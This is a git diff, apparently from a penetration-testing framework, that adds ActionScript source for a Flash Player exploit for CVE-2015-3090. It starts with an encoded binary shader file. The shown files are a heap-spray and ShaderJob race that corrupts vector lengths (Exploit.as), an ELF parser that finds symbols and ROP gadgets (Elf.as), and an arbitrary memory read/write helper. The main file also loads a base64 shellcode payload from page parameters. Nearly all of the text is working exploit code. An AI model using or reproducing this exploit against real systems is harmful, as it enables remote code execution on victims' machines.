zKpGu$hG8>ac^fYaO&tExUzF=SiwM|7neMI?TyRUzrP}jnO88@vGXiM&d^cxWCf5V@
zUtE!Ks_^FU=}eQbphVCTluiX7U|QVP#Ghugz29yntK>cuFv!0Ja~i(`mnlIfcCrz|
zmi|$M@9@!kZm&1@;vPo~Fs*P=oCL*@K2bM%CXqpKH6f0U#ZX4)W3OOMfUn^f245iX
z-0#2hc1THgWz3sXY>?~c!Z<v!YDGJDB{C&~?j<1e<i6Q^K#w_&S4z(`@8G@t?>1#0
zP~blJ8tTa@KJnaZO6_2mXf^j)J0TE;Lbo^>i4f1J^lCNuu&psa&nVh>WYV&$={`nz
z;KYd&e>OK3B}C_{xbP*@c6)^PIaJ9zg_naO!X`V@y187VYZ^7)8R9xx@&dD(dH;38
z`U|zMJM;CAHNA~LCaaZt@GY(}q2GR)+#R@q0=wgTwKGH#lnp=@m2#?|d<nYpcoklI
zJb6EtXGe064`N{`e%v-K9>J|eI{lxMUNJ}oMDe+lLYEjV&#5v~k9;VCr~ZoqoHsiG
zfi%Y(zJexB8>1aZ2-xa5M>X27O13*)>x?LQRUtTVp#nHe$@D+8v>FMQ{DlepdOb<>
zN4dW=(#A^*C-XWp4ecd!Pzxf#?a65XVW9d)=q}wfL)65BjpsXle_g_kV|ue)opC5t
z8pg<GjsYVa<qr#@`-Zzex<zugc=hx#7!vlUk5$~-`b0p2Uo$c+^}Fw5bZj??ck8`4
zV*IK3+7}_rD?=(3`f1!CaBMcQN7-ik?HSJOgDv8+aU(AAl#H}fJNZ{45%FQ4W+EnA
zNbiY}u*V~GM(x<~N;XN2Bf7ZS_&$9mT2K1f=uD2jd4>CKkjt~h!wmV*>CU5LQA$u7
zLwGIWW8Bx)zb^b%mGyZ!3|HD`|KnuBf|DIkAx!O=)}IZJ2EO6LFlj%go#j_d*Y9Ef
zN1mW0xgwH+@hUdi;Gp?dfMCY=;jD^Bo9~@K#;n*+61qIokjDSaJk=-AjqA}lp9)%2
zpsO-!G?3EjI7=HbcXAjqZsx#JO)qB*?f0Cz6l~3?GzL!MNHsYj*@bpeCvOe$WV}Av
z<!YY7Ix9*~>AT%&=Fd~sqwUO>86m%2cB=g^W%$x0?DI%d6({yJa5k5zNgjo+9sLty
zN>rSU`P-^3UW=zfySz3j3>$U~%fdcu-+o`h93cD&_c-6`>m#B3+x>iwx&Rdqy?X(7
zLgQSZlQbq^mSUj-biQf1vQf-Jz>(C-C)ez$oW{DSp%X$7UP-14ry$n%Z@5>w$s$=Z
z74mz*4{pk9jQ5iBh5=}1)l@(Rf}c%8{b9n9gyOw+XKrrf<33H!P@C=7dKNENK8V@f
z1afJH`uQDzpYHwJ2Fn-?4{PbvQ3;N$)&lhtl&Oq}KjY*5dtna}4kq`H?^HYZeGC_(
z`<&}ns7y`;vv*e{+iDyo6$5bVz?O(4FW68+PN(u43I^|lz0IvVoOdcC99$2qBMEIc
zTT?YGW--dl#8wz(J>7t~bH2@4>yY6|c7C^-C%r+Re*+vwN-b(Ilue2XF?V#u_EH|Z
zAfC)Gjbfym1n3f1sV_~iEjFH@+L+X_?1j}a9qoO=U^3$t?GH1rM)xbQLCf~h|Az-^
zjS!#TB?GA<h?jdSIR_<EBib>LXDpv?b$7HrkLh4{p=SPA749zE(FwK|2qu7R$s1%)
zGhVOd52GrZ&7+fDz8}qiudbrDa03T`k;pQhn4JXp^S2rw3}~4(3j#@%C~{`T8}0E%
z)_;_YPx`*qh1}|PDlHbEH(q%uup9Neu`;Y?4o`+yZA9JQ9S{VEJ)e4#$6@|J4So?)
zVv6A!-0l3ey^$%737Od?Iq!ViuYWx0*g)Pu;59w84>s%3!;}Y__C)12uDOC-wiO~Y
z24aF?5#mckZ?^LYpsl#<f(Zt)(_+SZ;za*R!()KT{hBPhQ>FexePb;mhuo9wE)4b?
z2(x)+FcO30F8>Y*F$Tp5t<#QraMbfn$;PFf!uGYbXZ_LeG)Y?CSZzu>%P5tRW&lFu
z%zp+;9n7%tRxM1lV_E!vL%<B9q}bLW0*`_b0R7uZ0arMK=c8?~#UuqJT=Q?<s$v$K
zT{;+xiFdwl<7o66f&9Se<aaksKF;qKd98I|V@o+OHh0T7ho+$KRCtSLh+9D_6u-n)
zP`a>)XPFOhPtRB>GKG30;}RwTKy&Sdy0L9k%0G06?;vf2gn^zeFyK!fTYA|dFiW+<
z^oXV5p|x--UV0qIm|Fnb50hQ29;S(30SXyZ-^n3r>lHb|00p;?Sl3l6)M6V3{}-X+
zbQ%xLn<60E!nD_)@jIp(10<|pW{qRf(U{=F49V_;Dmz8>yAxZ8)itHWl5T$ay*&XW
zS)C^`L*q0Vewd>P5D?Jy3cgU|c2oIdCJ7%WZ55p!Ik<Y*QVw{_^}lRy+M&jK!mtum
z{>z37b2{x#^c>GXUOdE+Vo-5SF0F^dhHlYM|AB&94-^)m2-F&}2N9-*rji2YMP<1;
zGNUh^(UT(^Qozb!W|-{qUkn3gbE=Ay$ey)rTn<aFu2k@QiAi^EiV%xX@9)dc6CYoO
z3SbA@4*G!J929*hM0$8~@7gpp%a$LZ!N0l`tOTL2I|h+JjuT_O<JcL)n;iP}b5_bB
zAsGBa0?|+fE<N8dX&x&3q42@ak$|4gfS+=`#0<B<V-ed(=s&QwJ8@6ZKn!aCuG88k
zGyWZi-Hs$*$l^IoNxJUsiD;f@ABc~@RmmhLLe}J7VNC%vZ41ln<{OyRm>q4Bo7i>O
z26pUAQw=|f6jNsIFzEjoqXG0bh;ZvWdL4Du#}}|m$Tn?lPB;f9a!Z{BOq@8wr`vMn
zW!d!qe7_tv#3MW=PW`|Z`{wR1B+V9@S1lD_GAdAm_LVkes2Pq7QHvgihwOu{y|`QT
zHD%-musToBYT@$Qu+z?pAx5rM5Otf)F4aK|$f{Pmi_k^pd~$JLkEwyL;81Qu>>dv4
ztSYG(XV^F-+<V!5z0B(p*cB%%W6z8QT#17W@p#FX__v!bmgf!OS%Z78wg_S;<f7s{
zbYMMOq!0lXCf3L6fLf1FcR4?kd40k7u=sA40h<zJ?S+4`6GH;S3UIodgWwx$UtVLw
zD+N0Zy{uj++Ivw*x8ji9liq>Vf~I}cGya{TGHMZO3DLML(PoVSasMWFFULpEs{tw1
z&}g1knSlcFN~y^bc-C>ktRW-RIOW&+Pab;PJJ?R^amRe57t+sib}0>;CgPfz=98r~
zo#&+E;cUg*mNbXcGO3>t*mjVN(RG(VMa`D}G?ErtX|{Hcwmv)P$@4w&+B>#pVNxz+
zuP0|e^R_;_lslKZ-&7FTd?O;n7&H!(r)xZsjkVNj&q_S8$pv~nb-gQat5L@}N=)?~
zJ9U;MAHvIPl}&!u*o;5}CKX{CE_=LX7koFs(FDybLufL6?p|P{v;TI$`GN)xC6ROD
z+BCm`1(V56p>(5n18lz~)#M4T*uh!@-7gbP!n*0wdIRoxPE5-`g#GeVHT7l&25au9
zr!UG_3`11i_)oiY{ML?fa{{#<yyUvD%vXL{WX+M&w(PZ9cV%xCwAA=kC-(}^Qc9O*
z+%wC5juO54$nt?mtGz1eQKRM1u6KJpKZ>;cMq8fpGTU&61iR;JGH9atJm&~Q4w>@d
zXkq~yl^iKu75C5Nj0U)lf{UNJevl=f#Jj8(W1)JGZ($*58Lu~WD?r_)i86lWV#O}h
z{NGqXdbO{E+z~f3B3&#voaH6D<kkeGVIr?7o9NKd=c5u3Td~%|q6gC%1(6Oi<ObJX
z;h9u0uuHPGI^>k&k4p)|BbGcWT${bHN?q9Qd|Uq8>TZUTk<QWs$WF3bkIFSztw;Fq
zbW?(LxewRLDH)?6JFNnwgOAtMHCLRGY4_<el&VkxM~qD3o;E<B7a`dnU~Ha_+l0I!
z(+q$_fFRB8h%T%7ZKWGG|0$C~&u=uhM}@lziC_=4txOy}ity*Wrg7Cv-{g90F69GB
z-cr~3;!MyY<02t=(AHYz_2C2<BH*33&tI@a92^cDe5<R>nbTja;AlF%nCWQ3!0lY}
z%>i3LUIv_mK5DIGsS&HlD$3Riok$x%O$Mfs`r*snC3E&{uzy^W|BP&R`9P#n{@-W=
zzPHkLz|xnIBaawe`POzXftiHw$-3l|`>#gs6bA!9vwF7mlG~zbiG|F8`3Omv_Tp9^
z+_qIsKgn^C<o+r3aBDkDO*#@0wD=BJ(CrnRsSeQ5aVIVoLwiRi0Sxvo8<za1cE*gz
zN9|NhEm(a^jLbg*%=Daf>%pkxw7Nx^^*imPS0&1pB%T5fG8}77+p*JXcGno-d|L|{
zj8IIykWh)aGBD=)KrzgBrb~8N_jSEbkcR}UGC4CNz4D%u(S?JWHw}=}iY{NX5KOK?
zJv*XmSw-qdH^aDZl51XomWW>i8h`U^tgoo*Wa4{uJ(eJeagCvlGf(vTYyrVOYQeRa
zr2Z9rxWY4uk1$Q}q!>?sCOCCbI;5iIqgO&x=3eMnvi#OJNY9210n2Bzr+$zr{T{PI
ze|(&S$U02w0j(g0tjJ+=(F$)l)<G~UKX}szCE!cX>v*{Rrz@9GUU+m5&rBwk1S`J`
zS68Dkf3dcB3KD)Rgo&&)UDMXd%i`r$#_`!$I4zwJw&=X^VM*S^q9-snDly*!Azqg)
z{>J|F#dpNG(;~lR5mquG9e9a=GqXL34(9tYQS*Q{D<9Mzlu)lsU`2*)(bZW|Lnrh&
zy+4iToEsNEJ2@a~q}pAI8exQ=8&g>2C=c`oC{7zmS**DN)geCbI#4OY3q#M<#5tT`
ztl3s4bH$a9yuD?BsSxlL?+pl@<B+;{whaK<F1ykDw9cQix^XB5nLb2Wn?|F2v9EZ`
zK0Rs(D5qBo4TozEQW9^yhQ0adSzqtS=ML<ZA5PDAi){Upxx{rwG$fx`M?AvD%bdy&
zue{`4b_1ExwjgcPqh!rqi4d3GV*Gm~QCc+MUI%aLVa=^>sGWATmV^M=>kpvpLD+JP
zS5dvu<&$?2|6mox#FP!(*H}2IKF-sHTsZ4HgQiboSp9rfANjgt8D$+$Ow$L>HjLGn
zaosb5T!wk}nJVj)JnU-#_~cTUc|{D0-g*$9K~S5<pGttBW}o;vD*Xtks7aGA5+(SD
z$9GX(rJMH2K!C4sw51^(s|5qrjL0z+@U`Q;<=E*M-@g^;15Nfk7G=W%jG88gad?xF
z5I!!zQJjO|QeG277U2^(HNc_0hno=rKd$B@4f%yrqP8S3YNy+R1IP462ldGD=s`wS
zL-Khp&h<2EV;(eInl9A~aqxS0&M^JcfjctX7Oy?F^*WR}^O=L9`Jq0cwz$?o7|}OE
zp4K#N5l_^lEo-HL!$-#S|5~E{9KoA!Hr8&Ozobp0C--}vwjo>@I__^=B=Y$l;6UyG
zaU@#8%rCps*Nr0m?Rj2Lo&H|a+G&WngG79en~yTdku$IFmssoz@2^ipM_O=XydlYY
zrpj#)|0+I61gBUg--bez8GKIArdz0hoK<IPjRb}1fNq)4c46X%g5prM6at<vUpAn`
z)gL(&#6TUZr(~8#drj@JT!fjp_gIh&V7-;8p``bakbQV>Hv-H`4p%Pva|{lGPj0**
z<54j*9gf^Q0UU^pBV`b!2UW+E$hXyC80!eESNVp|<bE>&ns>|yCdhz*|HZ32`sRQE
z9cmA#ppY&Vn_DUUa;=hebH^RZuCu<XfQ);NjP3vWU1t3bB6yIl2=%vNmYYTiiUdf`
zV64G<>1gJn9TchCuyc;<7FTL4WKcVaZAHTTO~KY18T->%qZ)C3WLgpd_0d}p{a+B3
zH<J)dY3H0z86rEAs0hCtdnNmWwb+^;==*ad(X9zn-IW(GMYu!G@f`<Z{FXb2Y}Q@b
zc{x(OSu%%VJw`bfoZE>n%NPJelSNW}%NJoOy%zKLTPz7f{Qm|;BK!7JzxaXWkq05j
z$b#4&A))p*Iv@6L!;NECsZrB6s#v&ESz{V_;NhEDMJ~VB5=kj7+iT~o0I_`<B+DB)
zfY9iXDdI9Xzco9?CdJMx010PME>n@~Cz7FUNAT`9fTXOfYhBj!guL;<D5!qtYbLNl
z^#)AW@iJpS1&xoJ5J&667+LsVRV^1~SYJX>We-klB;F!u$t0szY+t}n+SG_`*8t=W
zn%2cx!-(2Y1!>iPiT((|GsYw3=Ff5}?fNbT_WTApuck{rDdS-G08bzljbtiq*)UBl
zFVvJXKtZWY55JG9sgWFD_ibsC<g`*WhebpwX;+v5l$jZV>#=jQvSo1?LMyKE)gwb*
z0FK1y$SaC1j*I@_slLw*v_}f(%9)tQgz>hSDO%aqvLdC48L8ZC!j`>-PoAMeKHs+X
zI4I1~Ci0+S_jU=GCdbi!xC8ciAKlS7SkAK6LaHvM3<g(Sib)ih1J?hhHm6yUGYfSV
z0^tL+4D3DqwHk~PBDDzjds)M`%-rZkI=g~{LI<O#g=&VT=I1s(@#UCTNq7f$Wd0sZ
z44ogHpqV{Ceb^%s<x`W?ZJ?6~>V~5aD6Rd2#{;DNQ@Kle&)-NZX_aBcmpUYw2IgWS
z+fGCvO6Z|6XK*BaW0#EWIV3hPM^Mo1M!gd-uZ5<$^7Szzt~zp<RXH1+Sa$^LJGYwb
zrM%-K@z4SE$1dp>4h5+Rp|yWrDc2M?dt||mr1D<ew!6GlMnfH;kPZRWYEz4TyKeh{
zQ)BY5=?VqPE3X~N!TMGN-^8A!ApQ-xpZYSYw%_FyIdS`W|G{o@xS<Bg20Gd&FR;(j
z711Gx&Kz3w^47q{`|DT%_zm<pAyhv^7CPFla_8==*rhNKHo?r$&V5gZr|W1ylrDoM
zT2}_kl7f1qC$+U6m#a45&CY=N-3Epd@<Xdb(k2;?^ew~2hp|#kI`eFKG(S(zf@MwO
zL_F?HOV@%9QOfQT@L-zS>_H=+igQ#etO<5%NKzb>@2B_`c_J3<8aEFYA9ELxbu6n*
z0^8!grnd4G1l8OSM9{CJlvHLNAl&_fH#J46|DL{qkch(tOa_lmdi!~7xwg`Cosqa_
zxDJuSxhUc_0UJ0yU<vjc$TGL~nIim+292&nu2y@c2uZxWUZPe9N4YPwEQ$4b%PrtA
zaZ#gCeHjR?x69-)+D&CdC&xY{u5m5f?52}6=-!R?XeVzab+dkN?V1nY3LAV2Db?LK
z%!AqF?J}UbL%*_wVYgBt(g-`UoV=$b#{=i~{N~}gB{rTFvCzowL%~m70II81R0dca
z7n(C_WuSN8ziVtml#^gNA!ybvd}LFQj@T~FEod`YaaG~CVfLfAV&nZexi#>sJ0;lG
zS#cslZeW14d`LCTQTgG*_lt@?cmXK2gl0){P5t^6EY)aDM8%tmVxxxnq~%vgCOVh5
z!^%th=^JI;#p4aA$#c*Uq{%5w#CPxoSY@cw>~m$syws?X<{dqsoXd2DnZS&ZyBoy2
z18#CMys9D+R-41O<J`|!_jPW;-u~-pP(d`M5SE<ba}leAh;q`jRbP&S1R&=LfMIbt
zp|n>iF%t^3$}QqNPB6X&+&w^hRIL-B8_e8ee21Eo(%|)|_CFY-c2PZA;wkvRT8L@^
z8Pvlo`&6!&mX>ABi5O&KS#O*|IKXQ$a{8M79}7j^r`_uqbU+Bf%|7<(QdU%-2`7RE
zMs9y8c*<=D-`89a2(KKT%*Yf1&r)I~b2Nff#j?4Ng<zBv2&o#G;`-ja*T!rV1zlL@
zv-VTFM1`2XnE+e-rzhGiC2mv4o*+irXT)uV`w6hS>**g;@JM?6ukTEx5njj+Qd^4K
zaPE;LPz+05T>7J>8mq+$CY37L`{A=B>basc26P71%Zxy73(_;KodCp^lG59!q6W0B
zaz_)1!-m?*TwtI9Ls0#%%KfcYBw6!c1xo*`X1gJ%rn*bnCyddAUngep6~QXw7M3Kx
zJxNtgFj9wy<I4IIQ(Ygw0z>~+v;IPUs3Yjdh<TjovR<6#toLHe_=!%ui^SL33smYe
z8b}p2%<q^a?_8UAu4=Kp`ObdWA>1(4m=0^-pvQ*G7Y)8~@eXP9gQX#->i8q@QBxAC
z{y)@2ucnu!;-<QCv2G@F+6=`!LD+TsZ_YHF+#2BS?b*$s#b4izO}60HLL3%Hz#nGm
zO~|y<SXWriE4QIgT3m{H;R$k<D&cvy0VDo-Aj~k~J59;Vz{@4}qUBzj(oL$0*CwXz
zM^o9R6sG}57(MIOuQTCE(vvrK%)iuQCrE!bXJ%+6r;91FmwuTqsx-je1<Z60W0rYf
zx*Tdc7Voe#xHRYu_aWw>uCuz19Vq`yZyIt(F{(q3L7s@-l$;ywsd6xJ<DV$mJSeMu
z!oH2&spg875eW;pi2k#84(FIk>)Hd-g*ZV;2&m7<P{$U3Ap%fdVlVZ=pEMe>Oi2PC
z3v?)Jyu!Jd_!iQZK_$#ZV3>e*%`bf*M7}YT(w}Gq&TQE2W_ljIVmw9=6SprPI(A_{
z>e&K4?glF!c>T6CDY9uI-$Nb_mg24o#-c65=dx3C$aA3<G#&-eq&r^PnHdY%Y_DGk
z(zL;H>tQ16F)zF<TiIP}T)hq7aIvM{B@{RO32LJyP_=&f0?;cvd5`6rTxW+?p9!&=
zE)gTKR>ErMGML<Bg{M;UNP0c3!~+)cgXm||{pNiMz5Ty2j1S_ARzjuvkLG6$GB5)?
zo4!A%&x)dLCo2s1{MQjj;c;XI>Me2wf3@xZZ-MM~u%IN4dnVo|3ak6EY2q8d)Ze9b
z7$Pce8}#V@bN4*@A_F?2l^zsRYO`Zx-wxtW%nawqd+Kb^9foEFf?%zUU&Ue92J$jc
ze*zylx*(DtH(;wICE%tBQT!+Qkco{%TF+Q>4sTqI|DkgaDyr;wHiVZ8Q&2=B{G#9=
zxteEM4{g@n#z&vI<F>H;8$x@Jy}BwxJx7jyBvmU&0_M*pL|<i6zB*0-^Z_>kQe043
zLI2uaz}xP?GE-_H*5O(`077r%;0kgDUx~6p;HSMOQ%R$=;|}H-$-#+>_;b`Xe~Unm
zzwRSEbD{TfRUwITdQK4x#ssVyITRnU$#Xt*+$ADPgfE4l#=u-^=AQ@6ztlLu{YZGB
zyslZ$>9I%9cuRqGQ=(S!uKvi&YAoBn9x%Yb&<CmG1_Ax%fULXOJcj1?a8cS+g!)?e
z1Ll~!Hl9(@)&OM<4vyz@q)Xi{?NXKJqq)0_H!UO;OA%1Q;j{5hYweq-Oe3BkRGx7o
zoE#ewq%_u!55H>{Bat0Bk#-_a7mSd&&S;YTq^Y*-j-l+i9H%Y)+Hw5Aa>SJWWv4r)
P-aepkA`xEy=YAz=i4pvO

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2015-3090/Elf.as b/external/source/exploits/CVE-2015-3090/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3090/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3090/Exploit.as b/external/source/exploits/CVE-2015-3090/Exploit.as
new file mode 100755
index 0000000000..761a4164a4
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3090/Exploit.as
@@ -0,0 +1,102 @@
+package
+{
+	import flash.display.BitmapData
+	import flash.display.Shader
+	import flash.display.ShaderJob
+	import flash.display.Sprite
+	import flash.utils.getTimer
+    import flash.display.LoaderInfo
+    import mx.utils.Base64Decoder
+    import flash.utils.ByteArray
+    
+	public class Exploit extends Sprite
+	{
+		[Embed ( source="exploit.pbj", mimeType="application/octet-stream" ) ]
+		private static var BilinearScaling:Class
+		private var ov:Vector.<Object>
+        private var uv:Vector.<uint>
+        
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+        private var exploiter:Exploiter
+
+		public function Exploit()
+		{
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+
+            var srcBmd:BitmapData = new BitmapData(0x93, 1, true, 0x40000000);
+
+            // Create and configure a Shader object to apply the the bilinear scaling bytecode
+            var shader:Shader = new Shader()
+            shader.byteCode = new BilinearScaling()
+            shader.data.scale.value = [1]
+            shader.data.src.input = srcBmd
+
+            // Put vectors in memory
+            ov = new Vector.<Object>(1024)
+            
+            for (var i:uint = 0; i < ov.length; i++) {
+                ov[i] = new Vector.<uint>(0xa6)
+                ov[i][0] = 0xdeedbeef
+                ov[i][1] = i
+                ov[i][2] = 0xdeadbeaf
+            }
+            
+            // Create holes by redimensioning some vectors
+            for (i = ov.length / 2; i < ov.length; i = i + 6) {
+                ov[i].length = 0x14c // 0xa6 * 2
+            }
+			
+            // Defragment memory so hopefully one of our holes will be used 
+            // by the ShaderJob later...
+            var defrag:Vector.<Object> = new Vector.<Object>(20)
+            for(i = 0; i < defrag.length; i++) {
+                defrag[i] = new Vector.<uint>(0xa6)
+            }
+			
+            // Apply the bilinear scaling with a ShaderJob, so the job
+            // can be execued on a new thread, providing us the opportunity
+            // to tweak the width attribute after starting the job, providing
+            // a buffer overflow situation
+            var shaderJob:ShaderJob = new ShaderJob()
+            shaderJob.shader = shader
+            shaderJob.target = srcBmd
+            shaderJob.width = 0
+            shaderJob.start()
+            shaderJob.width = 0xa5 // Overwrite "next" vector length
+            this.WaitTimer(1000)
+			
+            for (i = 0; i < ov.length; i++) {
+                if (ov[i].length != 0xa6 && ov[i].length != 0x14c) {
+                    Logger.log("[*] Exploit - Exploit(): Vector corrupted: " + i.toString() + " : " + ov[i].length.toString())
+                    uv = ov[i]
+                } else {
+                    delete(ov[i])
+                    ov[i] = null
+                }
+            }
+            
+            if (uv == null) {
+                Logger.log("[!] Exploit - Exploit(): Corrupted Vector not found")
+                return
+            }
+            
+            exploiter = new Exploiter(this, platform, os, payload, uv)
+		}
+				
+        private function WaitTimer(time:int):void{
+            var current:int = getTimer()
+            while (true) {
+                if ((getTimer() - current) >= time) break
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3090/ExploitByteArray.as b/external/source/exploits/CVE-2015-3090/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3090/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3090/ExploitVector.as b/external/source/exploits/CVE-2015-3090/ExploitVector.as
new file mode 100644
index 0000000000..e41d9dc85f
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3090/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 0xa6 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
